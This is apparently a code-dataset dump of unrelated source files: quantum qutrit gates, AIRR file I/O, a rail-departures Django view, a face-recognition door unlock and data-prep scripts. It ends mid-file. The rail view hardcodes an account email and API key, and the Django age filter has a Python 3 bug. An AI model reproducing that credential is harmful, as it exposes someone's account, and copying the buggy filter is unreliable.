U^{\\dagger},\n\n where :math:`\\Sigma` is the diagonal matrix containing the eigenvalues.\n Otherwise, no particular order for the eigenvalues is guaranteed.\n\n .. seealso:: :meth:`~.TClock.eigvals`\n\n Returns:\n array: eigenvalues\n\n **Example**\n\n >>> print(qml.TClock.compute_eigvals())\n [ 1. +0.j -0.5+0.8660254j -0.5-0.8660254j]\n \"\"\"\n return np.array([1, OMEGA, OMEGA**2])\n\n # TODO: Add compute_decomposition() once parametric ops are added.\n\n def pow(self, z):\n return super().pow(z % 3)\n\n\nclass TAdd(Operation):\n r\"\"\"TAdd(wires)\n The 2-qutrit controlled add gate\n\n The construction of this operator is based on definition 7 from\n `Yeh et al. (2022) `_.\n It performs the controlled :class:`~.TShift` operation, and sends\n :math:`\\hbox{TAdd} \\vert i \\rangle \\vert j \\rangle = \\vert i \\rangle \\vert i + j \\rangle`,\n where addition is taken modulo 3. The matrix representation is\n\n .. 
math:: TAdd = \\begin{bmatrix}\n 1 & 0 & 0 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 0 & 1 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 0 & 0 & 1 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0\n \\end{bmatrix}\n\n .. note:: The first wire provided corresponds to the **control qutrit**.\n\n **Details:**\n\n * Number of wires: 2\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int]): the wires the operation acts on\n \"\"\"\n num_wires = 2\n \"\"\"int: Number of wires that the operator acts on.\"\"\"\n\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n @staticmethod\n def compute_matrix():\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. seealso:: :meth:`~.TAdd.matrix`\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.TAdd.compute_matrix())\n [[1 0 0 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 0 0]\n [0 0 1 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0]\n [0 0 0 1 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0]\n [0 0 0 0 0 0 0 1 0]\n [0 0 0 0 0 0 0 0 1]\n [0 0 0 0 0 0 1 0 0]]\n \"\"\"\n return np.array(\n [\n [1, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 0, 1, 0, 0],\n ]\n )\n\n @staticmethod\n def compute_eigvals():\n r\"\"\"Eigenvalues of the operator in the computational basis (static method).\n\n If :attr:`diagonalizing_gates` are specified and implement a unitary :math:`U^{\\dagger}`,\n the operator can be reconstructed as\n\n .. math:: O = U \\Sigma U^{\\dagger},\n\n where :math:`\\Sigma` is the diagonal matrix containing the eigenvalues.\n Otherwise, no particular order for the eigenvalues is guaranteed.\n\n .. seealso:: :meth:`~.TAdd.eigvals`\n\n Returns:\n array: eigenvalues\n\n **Example**\n\n >>> print(qml.TAdd.compute_eigvals())\n [-0.5+0.8660254j -0.5-0.8660254j 1. +0.j -0.5+0.8660254j -0.5-0.8660254j 1. +0.j 1. +0.j 1. +0.j 1. +0.j ]\n \"\"\"\n return np.array([OMEGA, OMEGA**2, 1, OMEGA, OMEGA**2, 1, 1, 1, 1])\n\n # TODO: Add compute_decomposition() once parametric ops are added.\n\n def pow(self, z):\n return super().pow(z % 3)\n\n @property\n def control_wires(self):\n return Wires(self.wires[0])\n\n\nclass TSWAP(Operation):\n r\"\"\"TSWAP(wires)\n The ternary swap operator.\n\n This operation is analogous to the qubit SWAP and acts on two-qutrit computational basis states\n according to :math:`TSWAP\\vert i, j\\rangle = \\vert j, i \\rangle`. Its matrix representation is\n\n .. 
math:: TSWAP = \\begin{bmatrix}\n 1 & 0 & 0 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0 \\\\\n 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 0 & 1 & 0 \\\\\n 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 \\\\\n 0 & 0 & 0 & 0 & 0 & 0 & 0 & 0 & 1 \\\\\n \\end{bmatrix}\n\n **Details:**\n\n * Number of wires: 2\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int]): the wires the operation acts on\n \"\"\"\n num_wires = 2\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n def label(self, decimals=None, base_label=None, cache=None):\n return base_label or \"TSWAP\"\n\n @staticmethod\n def compute_matrix(): # pylint: disable=arguments-differ\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. seealso:: :meth:`~.TSWAP.matrix`\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.TSWAP.compute_matrix())\n [[1 0 0 0 0 0 0 0 0]\n [0 0 0 1 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0]\n [0 1 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0]\n [0 0 0 0 0 0 0 1 0]\n [0 0 1 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0]\n [0 0 0 0 0 0 0 0 1]]\n \"\"\"\n return np.array(\n [\n [1, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 1],\n ]\n )\n\n @staticmethod\n def compute_eigvals():\n r\"\"\"Eigenvalues of the operator in the computational basis (static method).\n\n If :attr:`diagonalizing_gates` are specified and implement a unitary :math:`U^{\\dagger}`,\n the operator can be reconstructed as\n\n .. math:: O = U \\Sigma U^{\\dagger},\n\n where :math:`\\Sigma` is the diagonal matrix containing the eigenvalues.\n Otherwise, no particular order for the eigenvalues is guaranteed.\n\n .. seealso:: :meth:`~.TSWAP.eigvals`\n\n Returns:\n array: eigenvalues\n\n **Example**\n\n >>> print(qml.TSWAP.compute_eigvals())\n [ 1. -1. 1. -1. 1. -1. 1. 1. 1.]\n \"\"\"\n return np.array([1.0, -1.0, 1.0, -1.0, 1.0, -1.0, 1.0, 1.0, 1.0])\n\n # TODO: Add compute_decomposition()\n\n def pow(self, z):\n return super().pow(z % 2)\n\n def adjoint(self):\n return TSWAP(wires=self.wires)\n\n\nclass THadamard(Operation):\n r\"\"\"THadamard(wires, subspace)\n The ternary Hadamard operator\n\n Performs the Hadamard operation on a 2D subspace, if specified. The subspace is\n given as a keyword argument and determines which two of three single-qutrit basis states the\n operation applies to. When a subspace is not specified, the generalized Hadamard operation\n is used.\n\n The construction of this operator is based on section 2 of\n `Di et al. (2012) `_ when the subspace is specified, and\n definition 4 and equation 5 from `Yeh et al. (2022) `_\n when no subspace is specified. The operator definition of the ``subspace=None`` case is\n\n .. 
math:: \\text{THadamard} = \\frac{-i}{\\sqrt{3}}\\begin{bmatrix}\n 1 & 1 & 1 \\\\\n 1 & \\omega & \\omega^2 \\\\\n 1 & \\omega^2 & \\omega \\\\\n \\end{bmatrix}\n\n where :math:`\\omega = \\exp(2 \\pi i / 3)`.\n\n **Details:**\n\n * Number of wires: 1\n * Number of parameters: 0\n\n Args:\n wires (Sequence[int] or int): the wire the operation acts on\n subspace (Optional[Sequence[int]]): the 2D subspace on which to apply the operation.\n This should be `None` for the generalized Hadamard.\n\n **Example**\n\n The specified subspace will determine which basis states the operation actually\n applies to:\n\n >>> qml.THadamard(wires=0, subspace=(0, 1)).matrix()\n array([[ 0.70710678+0.j, 0.70710678+0.j, 0. +0.j],\n [ 0.70710678+0.j, -0.70710678+0.j, 0. +0.j],\n [ 0. +0.j, 0. +0.j, 1. +0.j]])\n\n >>> qml.THadamard(wires=0, subspace=(0, 2)).matrix()\n array([[ 0.70710678+0.j, 0. +0.j, 0.70710678+0.j],\n [ 0. +0.j, 1. +0.j, 0. +0.j],\n [ 0.70710678+0.j, 0. +0.j, -0.70710678+0.j]])\n\n >>> qml.THadamard(wires=0, subspace=(1, 2)).matrix()\n array([[ 1. +0.j, 0. +0.j, 0. +0.j],\n [ 0. +0.j, 0.70710678+0.j, 0.70710678+0.j],\n [ 0. +0.j, 0.70710678+0.j, -0.70710678+0.j]])\n\n >>> qml.THadamard(wires=0, subspace=None).matrix()\n array([[ 0. -0.57735027j, 0. -0.57735027j, 0. -0.57735027j],\n [ 0. -0.57735027j, 0.5+0.28867513j, -0.5+0.28867513j],\n [ 0. -0.57735027j, -0.5+0.28867513j, 0.5+0.28867513j]])\n \"\"\"\n num_wires = 1\n num_params = 0\n \"\"\"int: Number of trainable parameters that the operator depends on.\"\"\"\n\n def label(self, decimals=None, base_label=None, cache=None):\n return base_label or \"TH\"\n\n def __init__(self, wires, subspace=None):\n self._subspace = Operation.validate_subspace(subspace) if subspace is not None else None\n self._hyperparameters = {\n \"subspace\": self.subspace,\n }\n\n super().__init__(wires=wires)\n\n @property\n def subspace(self):\n \"\"\"The single-qutrit basis states which the operator acts on\n\n This property returns the 2D subspace on which the operator acts if specified,\n or None if no subspace is defined. This subspace determines which two single-qutrit\n basis states the operator acts on. The remaining basis state is not affected by the\n operator.\n\n Returns:\n tuple[int] or None: subspace on which operator acts, if specified, else None\n \"\"\"\n return self._subspace\n\n @staticmethod\n def compute_matrix(subspace=None): # pylint: disable=arguments-differ\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. seealso:: :meth:`~.THadamard.matrix`\n\n Args:\n subspace (Sequence[int]): the 2D subspace on which to apply operation. This should be\n `None` for the generalized Hadamard.\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.THadamard.compute_matrix(subspace=(0, 2)))\n array([[ 0.70710678+0.j, 0. +0.j, 0.70710678+0.j],\n [ 0. +0.j, 1. +0.j, 0. +0.j],\n [ 0.70710678+0.j, 0. 
+0.j, -0.70710678+0.j]])\n \"\"\"\n\n if subspace is None:\n return (-1j / np.sqrt(3)) * np.array(\n [[1, 1, 1], [1, OMEGA, OMEGA**2], [1, OMEGA**2, OMEGA]]\n )\n\n mat = np.eye(3, dtype=np.complex128)\n\n unused_ind = list({0, 1, 2}.difference(set(subspace))).pop()\n\n mat[unused_ind, unused_ind] = np.sqrt(2)\n mat[subspace[0], subspace[1]] = 1\n mat[subspace[1], subspace[0]] = 1\n mat[subspace[1], subspace[1]] = -1\n\n return mat / np.sqrt(2)\n\n @property\n def has_adjoint(self): # pylint: disable=arguments-renamed, invalid-overridden-method\n return self.subspace is not None\n\n def adjoint(self):\n if self.subspace is None:\n raise AdjointUndefinedError\n return THadamard(wires=self.wires, subspace=self.subspace)\n\n def pow(self, z):\n new_exp = z % 4 if self.subspace is None else z % 2\n return super().pow(new_exp)\n","repo_name":"PennyLaneAI/pennylane","sub_path":"pennylane/ops/qutrit/non_parametric_ops.py","file_name":"non_parametric_ops.py","file_ext":"py","file_size_in_byte":17504,"program_lang":"python","lang":"en","doc_type":"code","stars":1965,"dataset":"github-code","pt":"52"} +{"seq_id":"25170186116","text":"import pandas as pd\nimport datetime\n\nCITIES = [\"Las Vegas\", \"Charlotte\", \"Pittsburgh\", \"Toronto\"]\nDATE_LOWER = datetime.datetime.strptime(\"2012-10-01 13:00:00\", \"%Y-%m-%d %H:%M:%S\")\nDATE_UPPER = datetime.datetime.strptime(\"2017-11-30 00:00:00\", \"%Y-%m-%d %H:%M:%S\")\n\nreview = pd.read_csv(\"./processed/yelp_review.csv\", parse_dates=[\"date\"], infer_datetime_format=True, index_col=0)\n\nfor city in CITIES:\n busy_id = pd.read_csv(\"./processed/buisness/\" + city + \".csv\", usecols=[\"business_id\"])[\"business_id\"]\n review[(review[\"date\"] >= DATE_LOWER) & (review[\"date\"] <= (DATE_UPPER - pd.DateOffset(hours=12))) & review[\"business_id\"].isin(busy_id)].reset_index(drop=True).to_csv(\"./processed/review/\" + city + \".csv\")","repo_name":"prototypicalpro/PythonWorkspace","sub_path":"YelpWeather/gen_review_data.py","file_name":"gen_review_data.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40309032587","text":"\"\"\"\nReference library for AIRR schema for Ig/TCR rearrangements\n\"\"\"\nfrom __future__ import print_function\nimport sys\nimport csv\nfrom airr.schema import RearrangementSchema, ValidationError\n\n\nclass RearrangementReader:\n \"\"\"\n Iterator for reading Rearrangement objects in TSV format\n\n Attributes:\n fields (list): field names in the input Rearrangement file.\n external_fields (list): list of fields in the input file that are not\n part of the Rearrangement definition.\n \"\"\"\n @property\n def fields(self):\n \"\"\"\n Get list of fields\n\n Returns:\n list : field names.\n \"\"\"\n return self.dict_reader.fieldnames\n\n @property\n def external_fields(self):\n \"\"\"\n Get list of field that are not in the Rearrangement schema\n\n Returns:\n list : field names.\n \"\"\"\n return [f for f in self.dict_reader.fieldnames \\\n if f not in self.schema.properties]\n\n def __init__(self, handle, base=1, validate=False, debug=False):\n \"\"\"\n Initialization\n\n Arguments:\n handle (file): file handle of the open Rearrangement file.\n base (int): one of 0 or 1 specifying the coordinate schema in the input file.\n If 1, then the file is assumed to contain 1-based closed intervals\n that will be converted to python style 0-based half-open intervals\n for known fields. 
If 0, then values will be unchanged.\n validate (bool): perform validation. If True then basic validation will be\n performed will reading the data. A ValidationError exception\n will be raised if an error is found.\n debug (bool): debug state. If True prints debug information.\n\n Returns:\n airr.io.RearrangementReader: reader object.\n \"\"\"\n # arguments\n self.handle = handle\n self.base = base\n self.debug = debug\n self.validate = validate\n self.schema = RearrangementSchema\n\n # data reader, collect field names\n self.dict_reader = csv.DictReader(self.handle, dialect='excel-tab')\n\n def __iter__(self):\n \"\"\"\n Iterator initializer\n\n Returns:\n airr.io.RearrangementReader\n \"\"\"\n # Validate fields\n if (self.validate):\n self.schema.validate_header(self.dict_reader.fieldnames)\n\n return self\n\n def __next__(self):\n \"\"\"\n Next method\n\n Returns:\n dict: parsed Rearrangement data.\n \"\"\"\n try:\n row = next(self.dict_reader)\n except StopIteration:\n raise StopIteration\n\n for f in row:\n # row entry with no header\n if f is None:\n if self.validate:\n raise ValidationError('row has extra data')\n else:\n raise ValueError('row has extra data')\n\n # Convert types\n spec = self.schema.type(f)\n try:\n if spec == 'boolean':\n row[f] = self.schema.to_bool(row[f], validate=self.validate)\n if spec == 'integer':\n row[f] = self.schema.to_int(row[f], validate=self.validate)\n if spec == 'number':\n row[f] = self.schema.to_float(row[f], validate=self.validate)\n except ValidationError as e:\n raise ValidationError('field %s has %s' %(f, e))\n\n # Adjust coordinates\n if f and f.endswith('_start') and self.base == 1:\n try:\n row[f] = row[f] - 1\n except TypeError:\n row[f] = None\n\n return row\n\n def close(self):\n \"\"\"\n Closes the Rearrangement file\n \"\"\"\n self.handle.close()\n\n def next(self):\n \"\"\"\n Next method\n \"\"\"\n return self.__next__()\n\n\nclass RearrangementWriter:\n \"\"\"\n Writer class for Rearrangement objects in TSV format\n\n Attributes:\n fields (list): field names in the output Rearrangement file.\n external_fields (list): list of fields in the output file that are not\n part of the Rearrangement definition.\n \"\"\"\n @property\n def fields(self):\n \"\"\"\n Get list of fields\n\n Returns:\n list : field names.\n \"\"\"\n return self.dict_writer.fieldnames\n\n @property\n def external_fields(self):\n \"\"\"\n Get list of field that are not in the Rearrangements schema\n\n Returns:\n list : field names.\n \"\"\"\n return [f for f in self.dict_writer.fieldnames \\\n if f not in self.schema.properties]\n\n def __init__(self, handle, fields=None, base=1, debug=False):\n \"\"\"\n Initialization\n\n Arguments:\n handle (file): file handle of the open Rearrangements file.\n fields (list) : list of non-required fields to add. May include fields undefined by the schema.\n base (int): one of 0 or 1 specifying the coordinate schema in the output file.\n Data provided to the write is assumed to be in python style 0-based\n half-open intervals. If 1, then data will be converted to 1-based\n closed intervals for known fields before writing. If 0, then values will be unchanged.\n debug (bool): debug state. 
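Note: the reader above decrements only *_start fields when base=1 because converting a 1-based closed interval to a Python-style 0-based half-open interval shifts just the start coordinate; a sketch:

    def to_half_open(start1, end1):
        # 1-based closed [start1, end1] -> 0-based half-open [start0, end0):
        # both cover exactly end1 - start1 + 1 positions.
        return start1 - 1, end1

    assert to_half_open(1, 10) == (0, 10)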
If True prints debug information.\n\n Returns:\n airr.io.RearrangementWriter: writer object.\n \"\"\"\n # arguments\n self.handle = handle\n self.base = base\n self.debug = debug\n self.schema = RearrangementSchema\n\n # order fields according to spec\n field_names = list(self.schema.required)\n if fields is not None:\n additional_fields = []\n for f in fields:\n if f in self.schema.required:\n continue\n elif f in self.schema.optional:\n field_names.append(f)\n else:\n additional_fields.append(f)\n field_names.extend(additional_fields)\n\n # open writer and write header\n self.dict_writer = csv.DictWriter(self.handle, fieldnames=field_names, dialect='excel-tab',\n extrasaction='ignore', lineterminator='\\n')\n self.dict_writer.writeheader()\n\n def close(self):\n \"\"\"\n Closes the Rearrangement file\n \"\"\"\n self.handle.close()\n\n def write(self, row):\n \"\"\"\n Write a row to the Rearrangement file\n\n Arguments:\n row (dict): row to write.\n \"\"\"\n # validate row\n if self.debug:\n for field in self.schema.required:\n if row.get(field, None) is None:\n sys.stderr.write('Warning: Record is missing AIRR required field (' + field + ').\\n')\n\n for f in row.keys():\n # Adjust coordinates\n if f.endswith('_start') and self.base == 1:\n try:\n row[f] = self.schema.to_int(row[f]) + 1\n except TypeError:\n row[f] = None\n\n # Convert types\n spec = self.schema.type(f)\n if spec == 'boolean': row[f] = self.schema.from_bool(row[f])\n\n self.dict_writer.writerow(row)\n\n\n# TODO: pandas validation need if we load with pandas directly\n# def validate_df(df, airr_schema):\n# valid = True\n#\n# # check required fields\n# missing_fields = set(airr_schema.required) - set(df.columns)\n# if len(missing_fields) > 0:\n# print('Warning: file is missing mandatory fields: {}'.format(', '.join(missing_fields)))\n# valid = False\n#\n# if not valid:\n# raise ValueError('invalid AIRR data file')\n\n\n","repo_name":"airr-community/airr-standards","sub_path":"lang/python/airr/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":7940,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"52"} +{"seq_id":"41551904134","text":"from datetime import date, datetime\nfrom django import template\n\nregister = template.Library()\n\n\n@register.filter(name='age')\ndef get_age(value):\n if not value:\n return None\n d = map(int, value.split(\"-\"))\n dob = datetime(d[0], d[1], d[2])\n today = date.today()\n return today.year - dob.year - ((today.month, today.day) < (dob.month, dob.day))\n","repo_name":"varshinim/drchrono","sub_path":"drchrono/templatetags/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37895419416","text":"from django.shortcuts import render\n# Create your views here.\nfrom django.views import View\n\nfrom nsapi import NSApi\n\n\nclass IndexView(View):\n def get(self, request):\n # Create the API wrapper\n apiwrapper = NSApi(\"527188@student.glu.nl\", \"pd6lcTRQk3UXIy5KgRUi1qR6gCBCeBZuocc4vuNajaKi6I9G2D6gmQ\")\n\n # Get the departures\n gutt = apiwrapper.get_departures(\"ut\")\n\n # Edit some information\n for train in gutt:\n gutt[train][\"departure_time\"] = gutt[train][\"departure_time\"].strftime(\"%H:%M\")\n gutt[train][\"comments\"] = \"\\n\".join(gutt[train][\"comments\"])\n if gutt[train][\"route\"]:\n gutt[train][\"via_text\"] = \"via {}\".format(gutt[train][\"route\"])\n else:\n gutt[train][\"via_text\"] = 
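Note: the Django age filter above (seq_id 41551904134) is broken under Python 3: map() returns a lazy iterator, so d[0] raises TypeError: 'map' object is not subscriptable. A corrected sketch of the filter body:

    from datetime import date, datetime

    def get_age(value):
        if not value:
            return None
        year, month, day = (int(part) for part in value.split("-"))
        dob = datetime(year, month, day)
        today = date.today()
        return today.year - dob.year - ((today.month, today.day) < (dob.month, dob.day))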
\"\"\n\n # Get the disruptions\n badd = apiwrapper.get_disruptions(actual=True)\n\n # Render the HTML template\n return render(request, \"Display/home.html\", {\n \"gutt\": gutt,\n \"badd\": badd\n })\n\n\n","repo_name":"tassilovermeulen/NS-dash","sub_path":"Display/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41970024114","text":"import face_recognition\nimport cv2\nimport glob, os\nimport serial\nfrom multiprocessing import Process\nfrom threading import Thread\nimport _thread\nfrom gtts import gTTS\n\ndef welcome(name):\n welcomeMessage = False\n\n mytext = 'Welcome ' + name\n\n language = 'en'\n myobj = gTTS(text=mytext, lang=language, slow=False)\n\n myobj.save(\"welcome.mp3\")\n os.system(\"mpg321 welcome.mp3\")\n\n\n\nser = serial.Serial('/dev/tty.usbmodem1421', 9600)\n\n\nowd = os.getcwd()\n\n# Get a reference to webcam #0 (the default one)\nvideo_capture = cv2.VideoCapture(1)\n\n## Prof. Dr. Slim Abdennadher\nos.chdir('pics/ProfSlim')\n\npics = glob.glob('*.jpg')\n\nknown_face_encodings = []\nknown_face_names = []\n\n# Load sample pictures and learn how to recognize it.\nfor pic in pics:\n img = face_recognition.load_image_file(pic)\n encoding = face_recognition.face_encodings(img)\n if len(encoding) > 0:\n img_encoding = face_recognition.face_encodings(img)[0]\n known_face_encodings.append(img_encoding)\n known_face_names.append('Prof. Dr. Slim Abdennadher')\n\n## Prof. Dr. Ashraf Mansour\nos.chdir(owd)\nos.chdir('pics/ProfAshraf')\n\npics = glob.glob('*.jpg')\n\n# Load sample pictures and learn how to recognize it.\nfor pic in pics:\n img = face_recognition.load_image_file(pic)\n encoding = face_recognition.face_encodings(img)\n if len(encoding) > 0:\n img_encoding = face_recognition.face_encodings(img)[0]\n known_face_encodings.append(img_encoding)\n known_face_names.append('Prof. Dr. 
Ashraf Mansour')\n\n# Initialize some variables\nface_locations = []\nface_encodings = []\nface_names = []\nknown_person = False\nisFirstTime = True\nwelcomeMessage = False\nprocess_this_frame = True\ncolor = (0, 0, 0)\n\nwhile True:\n # Grab a single frame of video\n ret, frame = video_capture.read()\n\n # Resize frame of video to 1/4 size for faster face recognition processing\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n\n # Only process every other frame of video to save time\n if process_this_frame:\n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n face_names = []\n for face_encoding in face_encodings:\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n name = \"Unknown\"\n\n # If a match was found in known_face_encodings, just use the first one.\n if True in matches:\n first_match_index = matches.index(True)\n name = known_face_names[first_match_index]\n known_person = True\n\n face_names.append(name)\n\n process_this_frame = not process_this_frame\n\n # Display the results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n if name == \"Unknown\":\n color = (0, 0, 225)\n else:\n color = (0, 255, 0)\n\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), color, 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), color, cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\n ## Unlock with Arduino\n if isFirstTime and known_person:\n if name == \"Unknown\":\n break\n # print('Unlocking for: ' + name)\n cv2.putText(frame, \"Welcome \" + name, (left - 100, bottom + 50), font, 1.0, (0, 255, 0), 1)\n i = 5\n while i > 0:\n ser.write(b'1')\n i -= 1\n if ser.readline() == b'1\\r\\n':\n known_person = False\n # isFirstTime = False\n break\n\n\n\n # Display the resulting image\n cv2.imshow('WhoAmI', frame)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()\n","repo_name":"AmrMKayid/whoami","sub_path":"whoami.py","file_name":"whoami.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28571709766","text":"\"\"\"\n对邻近的像素点进行灰度排序,然后取中间值,它能有效去除图像中的椒盐噪声\n\n操作原理: 卷积域内的像素值从小到大排序 取中间值作为卷积输出\n\"\"\"\nimport cv2\n\n\nimg = cv2.imread('../data/888157224.jpeg', cv2.IMREAD_COLOR)\ncv2.imshow('img', img)\n\nmid = cv2.medianBlur(img, 3)\ncv2.imshow('mid', mid)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n\n","repo_name":"happy426/learn","sub_path":"opencv/图片卷积/中值滤波.py","file_name":"中值滤波.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5731369179","text":"h, m = map(int, input().split())\nt = int(input())\n\nm += t\n\nif m >= 60:\n time_m = m 
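Note (translation): the Chinese docstring in the median-filter sample reads: "Sort the neighbouring pixels by gray level and take the middle value; this effectively removes salt-and-pepper noise from the image. Principle: the pixel values inside the kernel window are sorted from small to large and the median is taken as the output." A minimal usage sketch; cv2.medianBlur requires an odd ksize greater than 1:

    import cv2
    import numpy as np

    noisy = np.random.randint(0, 256, (64, 64), dtype=np.uint8)
    denoised = cv2.medianBlur(noisy, 3)  # ksize must be odd: 3, 5, 7, ...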
// 60\n h += time_m\n m -= (time_m * 60)\n\nif h >= 24:\n h -= 24\n\nprint(h, m)","repo_name":"BangDori/python-algorithm","sub_path":"baekjoon/2525.py","file_name":"2525.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72388846246","text":"import pickle\nimport json\nfrom functools import partial\n\nimport torch\nimport pytorch_lightning as pl\nfrom torch.utils.data import DataLoader, Dataset\nfrom transformers import AutoTokenizer\n\n\nclass CSLDailyImpl(Dataset):\n def __init__(\n self,\n samples,\n gloss_vocabs\n ):\n super().__init__()\n\n self.samples = samples\n self.gloss_vocabs = gloss_vocabs\n self.tokenizer = AutoTokenizer.from_pretrained(\"bert-base-chinese\")\n\n def __len__(self):\n return len(self.samples)\n\n def __getitem__(self, idx):\n sample = self.samples[idx]\n sentence, gloss_seq = sample[\"sentence\"], sample[\"gloss_seq\"]\n\n results = self.tokenizer(\n sentence,\n padding=\"max_length\",\n max_length=64,\n truncation=True,\n return_tensors=\"pt\",\n )\n input_ids = results[\"input_ids\"].squeeze(0)\n attention_mask = results[\"attention_mask\"].squeeze(0)\n\n gloss_ids = [101] + [\n self.gloss_vocabs[gloss]\n for gloss in gloss_seq\n ] + [102]\n if len(gloss_ids) < 64:\n gloss_ids += [0] * (64 - len(gloss_ids))\n gloss_ids = torch.as_tensor(gloss_ids, dtype=torch.int64)\n\n return input_ids, attention_mask, gloss_ids\n\n\nclass CSLDaily(pl.LightningDataModule):\n def __init__(\n self,\n train_batch_size: int = 64,\n val_batch_size: int = 64,\n test_batch_size: int = 64,\n num_workers: int = 8,\n ) -> None:\n super().__init__()\n\n self.train_batch_size = train_batch_size\n self.val_batch_size = val_batch_size\n self.test_batch_size = test_batch_size\n self.num_workers = num_workers\n\n def setup(self, stage: str) -> None:\n samples = {}\n with open(\"data/CSL-Daily/sentence_label/csl2020ct_v2.pkl\", \"rb\") as f:\n annos = pickle.load(f)\n gloss_vocabs = {\n vocab: i + 106\n for i, vocab in enumerate(annos[\"gloss_map\"])\n }\n with open(\"data/CSL-Daily/gloss_vocabs.json\", \"w\") as f:\n json.dump(gloss_vocabs, f, ensure_ascii=False)\n\n for info in annos[\"info\"]:\n samples[info[\"name\"]] = {\n 